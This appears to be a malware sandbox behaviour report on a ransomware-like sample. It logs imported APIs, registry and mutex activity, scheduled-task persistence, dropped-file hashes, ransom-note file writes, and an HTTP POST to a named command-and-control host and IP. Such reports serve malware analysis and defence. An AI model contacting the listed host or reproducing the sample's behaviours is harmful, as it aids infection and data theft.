IAT private_0x0000000000540000:+0x28785 95. entry of 5.exe 4 bytes kernel32.dll:GetUserDefaultLCID+0x0 now points to private_0x0000000000050000:+0xbaff
IAT private_0x0000000000540000:+0x28785 97. entry of 5.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0xe00feea
IAT private_0x0000000000540000:+0x28785 98. entry of 5.exe 4 bytes kernel32.dll:GetStringTypeA+0x0 now points to private_0x000000007fff0000:+0x7ffe9c85
IAT private_0x0000000000540000:+0x28785 99. entry of 5.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x6357e8ff
IAT private_0x0000000000540000:+0x28785 100. entry of 5.exe 4 bytes kernel32.dll:GetStringTypeW+0x0 now points to private_0x000000007fff0000:+0x58efffe
IAT private_0x0000000000540000:+0x28785 101. entry of 5.exe 4 bytes kernel32.dll:LCMapStringA+0x0 now points to private_0x000000007fff0000:+0x8000fda0
IAT private_0x0000000000540000:+0x28785 103. entry of 5.exe 4 bytes kernel32.dll:GetLocaleInfoW+0x0 now points to private_0x000000007fff0000:+0x69fbe800
IAT private_0x0000000000540000:+0x28785 106. entry of 5.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to private_0x000000007fff0000:+0x6de90000
Host Behavior
File (3)
»
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (8)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography value_name = MachineGuid, data = 0303d5b4-ffe9-470e-9dd8-7d9ec416e53f, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion value_name = ProductName, data = Windows 7 Professional, type = REG_SZ True 1
Fn
Module (222)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 6
Fn
Load user32.dll base_address = 0x74f40000 True 3
Fn
Load advapi32.dll base_address = 0x74d40000 True 3
Fn
Load oleaut32.dll base_address = 0x75220000 True 1
Fn
Load gdi32.dll base_address = 0x75ad0000 True 1
Fn
Load ole32.dll base_address = 0x755e0000 True 3
Fn
Load msvcr100.dll base_address = 0x749b0000 True 1
Fn
Load crypt32.dll base_address = 0x759b0000 True 1
Fn
Load crtdll.dll base_address = 0x6c240000 True 1
Fn
Load Gdiplus.dll base_address = 0x73c60000 True 7
Fn
Load shell32.dll base_address = 0x75fd0000 True 1
Fn
Load ntdll.dll base_address = 0x77130000 True 1
Fn
Load wininet.dll base_address = 0x753d0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 12
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe base_address = 0x400000 True 1
Fn
Get Handle wininet.dll base_address = 0x0 False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\d5bfbe52-943a-4f73-97b1-39918fa00598\5.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x76c3588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x77162c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x76c3110c True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetThreadLocale, address_out = 0x76c335cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardType, address_out = 0x74f99ac4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharNextA, address_out = 0x74f57a1b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x74d548ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExA, address_out = 0x74d54907 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 2
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysFreeString, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysReAllocStringLen, address_out = 0x75227810 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysAllocStringLen, address_out = 0x752245d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyA, address_out = 0x74d6a299 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x74d5412e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalUnlock, address_out = 0x76c4cfdf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalLock, address_out = 0x76c4d0a7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemInfo, address_out = 0x76c349ca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x76c31b18 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 2
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteDC, address_out = 0x75ae58b3 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleDC, address_out = 0x75ae54f4 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleBitmap, address_out = 0x75ae5f49 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = BitBlt, address_out = 0x75ae5ea6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ReleaseDC, address_out = 0x74f57446 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x74f57d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDC, address_out = 0x74f572c4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharToOemBuffA, address_out = 0x74f6b1b0 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleInitialize, address_out = 0x755fefd7 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749cc544 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
Get Address c:\windows\syswow64\crtdll.dll function = wcscmp, address_out = 0x6c25032a True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusStartup, address_out = 0x73c85600 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusShutdown, address_out = 0x73c856be True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipCreateBitmapFromHBITMAP, address_out = 0x73c96671 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncodersSize, address_out = 0x73ca2203 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncoders, address_out = 0x73ca228c True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipDisposeImage, address_out = 0x73c94cc8 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipSaveImageToStream, address_out = 0x73c94153 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CreateStreamOnHGlobal, address_out = 0x7560363b True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = GetHGlobalFromStream, address_out = 0x756041d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x76c34173 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatus, address_out = 0x76c38b6d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x76c33ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReleaseMutex, address_out = 0x76c3111e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentDirectoryW, address_out = 0x76c35611 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableW, address_out = 0x76c389f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x76c31b48 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCurrentDirectoryW, address_out = 0x76c41260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatusEx, address_out = 0x76c5d4c4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDllDirectoryW, address_out = 0x76cb004f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocalTime, address_out = 0x76c35aa6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RemoveDirectoryW, address_out = 0x76cb44cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDriveStringsA, address_out = 0x76c3e4dc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x76c4ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x74d540e6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = LookupAccountSidA, address_out = 0x74d81daa True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreateProcessAsUserW, address_out = 0x74d4c592 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x74d4df04 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyW, address_out = 0x74d52459 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyW, address_out = 0x74d5445b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumValueW, address_out = 0x74d548cc True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextA, address_out = 0x74d491dd True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayDevicesW, address_out = 0x74f7e567 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wvsprintfA, address_out = 0x74f6aad3 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardLayoutList, address_out = 0x74f62e69 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x771effc1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectA, address_out = 0x753f49e9 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestA, address_out = 0x753f4c7d True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersA, address_out = 0x753edcd2 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestA, address_out = 0x754618f8 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x753dd075 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetSetOptionA, address_out = 0x753e75e8 True 1
Fn
User (2)
»
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 2
Fn
Keyboard (250)
»
Operation Additional Information Success Count Logfile
Get Info type = KB_CODEPAGE, result_out = 437 True 249
Fn
Get Info type = 0, result_out = 4 True 1
Fn
System (257)
»
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 2
Fn
Get Time type = System Time, time = 1627-02-27 16:55:52 (UTC) True 1
Fn
Get Time type = Ticks, time = 111712 True 1
Fn
Get Time type = Performance Ctr, time = 17069156874 True 1
Fn
Get Time type = Ticks, time = 111759 True 93
Fn
Get Time type = Ticks, time = 111774 True 156
Fn
Get Info type = Operating System True 1
Fn
Get Info type = Operating System True 2
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create mutex_name = A6CF1546B-343A2EC6-63D8DC88-FF4A8C5D-82A11F69 True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 175 bytes
Total Data Received 285 bytes
Contacted Host Count 1
Contacted Hosts 188.93.127.108
HTTP Session #1
»
Information Value
Server Name texet2.ug
Server Port 80
Username -
Password -
Data Sent 175 bytes
Data Received 285 bytes
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = texet2.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /1/index.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request url = texet2.ug/1/index.php False 1
Fn
Data
Process #12: taskeng.exe
0 0
»
Information Value
ID #12
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {1F6180C3-866B-4F21-AF81-C0510D25BC0E} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:56, Reason: Created Scheduled Job
Unmonitor End Time: 00:01:09, Reason: Self Terminated
Monitor Duration 00:00:12
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x830
Parent PID 0x36c (c:\windows\system32\svchost.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 834
0x 838
0x 83C
0x 840
0x 844
0x 848
0x 84C
Process #13: a959.tmp.exe
0 0
»
Information Value
ID #13
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\34ab4241-89d8-4896-a0ef-745528a314bb\a959.tmp.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe" --Task
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:00:56, Reason: Child Process
Unmonitor End Time: 00:01:08, Reason: Self Terminated
Monitor Duration 00:00:11
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x850
Parent PID 0x830 (c:\windows\system32\taskeng.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 854
0x 8F4
Process #15: a959.tmp.exe
680 3
»
Information Value
ID #15
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\34ab4241-89d8-4896-a0ef-745528a314bb\a959.tmp.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\34ab4241-89d8-4896-a0ef-745528a314bb\A959.tmp.exe" --AutoStart
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:32, Reason: Autostart
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:52
OS Process Information
»
Information Value
PID 0x4d4
Parent PID 0x37c (Unknown)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 4D8
0x 694
0x 6B0
0x 6B4
0x 6B8
0x 6BC
0x 6C4
0x 54C
0x 520
0x 51C
0x 598
0x 5BC
0x 61C
0x 6AC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
a959.tmp.exe 0x00400000 0x00490FFF Relevant Image - 32-bit - False False
buffer 0x006084C8 0x0064E5BF Content Changed - 32-bit 0x00609803 False False
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe 446.58 KB MD5: f77e0ab67980f4c77759ee7eae12be69
SHA1: 0dc4fc7d75fed6f674580a823b6ca7c636bb39d4
SHA256: bd105bd4703fcf256822c9dd7b145903117d92e2859df61e62007d8cbf62458c
SSDeep: 12288:jJ8dGdWEcymwIHhW4cxZRfQOkpmm9Lkfc:tKGQECBWVYOC9LWc
False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\A959.tmp.exe 446.58 KB MD5: f77e0ab67980f4c77759ee7eae12be69
SHA1: 0dc4fc7d75fed6f674580a823b6ca7c636bb39d4
SHA256: bd105bd4703fcf256822c9dd7b145903117d92e2859df61e62007d8cbf62458c
SSDeep: 12288:jJ8dGdWEcymwIHhW4cxZRfQOkpmm9Lkfc:tKGQECBWVYOC9LWc
False
Host Behavior
File (53)
»
Operation Filename Additional Information Success Count Logfile
Create C:\SystemID\PersonalID.txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Config.Msi\_readme.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_WRITE False 2
Fn
Create C:\BOOTSECT.BAK desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\BCD.LOG desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\memtest.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\cs-CZ\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\da-DK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\de-DE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\el-GR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\en-US\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\en-US\memtest.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\es-ES\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\fi-FI\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\chs_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\cht_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\jpn_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\Fonts\kor_boot.ttf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
